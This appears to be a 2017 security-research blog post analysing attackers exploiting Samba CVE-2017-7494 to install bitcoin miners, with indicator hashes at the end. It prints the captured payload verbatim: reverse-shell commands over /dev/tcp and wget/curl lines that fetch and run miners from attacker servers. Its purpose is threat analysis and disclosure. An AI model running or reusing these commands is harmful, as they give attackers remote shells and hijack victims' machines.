Samba CVE-2017-7494 Getting Exploited in the Wild, Distributing Bitcoin Miners

June 12, 2017 by Alex Burt
Samba CVE-2017-7494 Getting Exploited in the Wild, Distributing Bitcoin Miners

In our continuous monitoring of threats in the wild, Cyphort Labs has detected multiple exploitation attempts using the recently disclosed Samba vulnerability CVE-2017-7494. The threat actors probably belong to some cyber crime ring because from what we can gather, the intent of the exploitation is just to run bitcoin miners. It is interesting to note that this exploit incorporates advanced functionality that was barely released in the Metasploit framework a week ago, which reinforces the notion that cyber criminals have a pulse on recent developments and are quick to integrate newly disclosed information in their arsenal of weapons.

Below, we provide details of a couple of such attacks.

Exploitation

The Samba share we investigated allowed write access to guest accounts. This is a prerequisite because the vulnerability requires that the attacker has access to valid credentials or that the share is writable by guests.

The first attack was perpetrated from the IP 45.76.158.18, which seems to belong to a cloud hosting provider. No surprises there.

Step 1: Identify network shares. Upon connection to our Samba port, the attacker listed available shares using the NetShareEnumAll method.

Step 2: Identify the local path. This is required for the exploit to work. In our observation, the attackers identified the local path for the share using NetShareGetInfo method. This is fairly new, as in the past days, they would brute force and try several paths like /var/, /home/, etc…

Step 3: Upload the malware to the share. In our case, the file name was a random string with a .so file extension (GJZjrflB.so).

Step 4: Trigger the exploit to execute remote code. Using the published exploit information and making an “NT Create AndX” request using the local path to the uploaded malicious library and followed by “\\PIPE\/tmp/smb/FWUNy14ZME/GJZjrflB.so” request.

Figure 1. pcap of one attack using CVE-2017-7494

Payload Malware

We noticed the malicious library would execute this shell command:

bash -i < /dev/tcp/rc.ezreal.space/4000 || ((wget http://rc.ezreal.space/minerd64_s -O /tmp/m || curl http://rc.ezreal.space/minerd64_s -o /tmp/m) && chmod +x /tmp/m && (nohup /tmp/m &))

which effectively executes commands retrieved from  rc.ezreal.space (149.255.35.33):4000 and downloads a binary to /tmp/m using either wget or curl, then runs it. The binary is a bitcoin miner.

After that, the attackers run the following script:

#!/usr/bin/env bash
host='149.255.35.33';
nohup bash -i < /dev/tcp/${host}/4001 &
nohuo bash -i < /dev/tcp/${host}/4002 &
nohuo bash -i < /dev/tcp/${host}/4003 &

Notice the “nohuo” typo in the original script. We initially thought it may be an attempt at identifying potential researchers who would correct the typo and connect to those ports, but it turns out it might have been an inadvertent mistake. Attackers probably meant “nohup” – in a Linux shell, prefixing a command with nohup prevents the command from being aborted if you log out or exit the shell. The name nohup stands for “no hangup.”

 

From the first port 4001, the following script is downloaded and executed:

#!/usr/bin/env bash
#minerd script
host='149.255.35.33';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat < /dev/tcp/${host}/5000 > $target && chmod +x $target && nohup $target &

which again downloads yet another bitcoin miner and launches it.

From 149.255.35.33:4002, we get the following script:

#!/usr/bin/env bash
# process guard script

This is probably a placeholder for future enhancement of restarting the bitcoin miner in case it gets killed.

From 149.255.35.33:4003, we obtained the following script:

#!/usr/bin/env bash
# auto start script

which may be a placeholder for a future enhancement that provides persistence upon reboots.

On a different attack, we managed to see slightly different commands sent by C2 servers, but along the same broad lines:

Attacker IP: 45.32.101.90.

The shared library also downloaded a bitcoin miner (see hash at the bottom of this blog) and then proceeded to connect to 45.76.146.166 to obtain and execute the following script:

from 45.76.146.166:4444

#!/usr/bin/env bash
#minerd script
pkill .so;
host='45.76.146.166';
target=$RANDOM; target+=.so; target=/tmp/$target;
cat < /dev/tcp/${host}/5555 > $target && chmod +x $target && nohup  $target &

Conclusion

It is clear that the recently disclosed Samba vulnerability is being actively exploited in the wild by criminal groups trying to monetize their investment. We will probably see this technique spread to include spambots, start lateral spread from the compromised systems and definitely evolve into full fledged espionage, industrial or otherwise. With the price of Bitcoin hovering around $2800 and reaching new all-time records every week, there is no surprise that bitcoin miners are in fashion again.

IOCs

Traffic pcap: c208fdfe2ce715bbd8dbedf83bd940f0e6fa4064d1880bfdd5ad956aa2e2531c
Exploit library: 13a0ce618dcd0e17c7d8267174d07a997d39fcea10f8951ea7c0b5218ddcfe85
Bitcoin miner: 1af2b594fe2b050fab44bc4f1d951a228192b22a6e4ba98a553dba78231d15e9
Exploit library: 06778ca06eb0be4a734a2908f3746764c148817707dbc32fad5f8dac6cc81e46
Bitcoin miner: c8b3f03b0275b5bcee34a685187cd6b648346d9ca7f1b0cbb255c45856f7a49d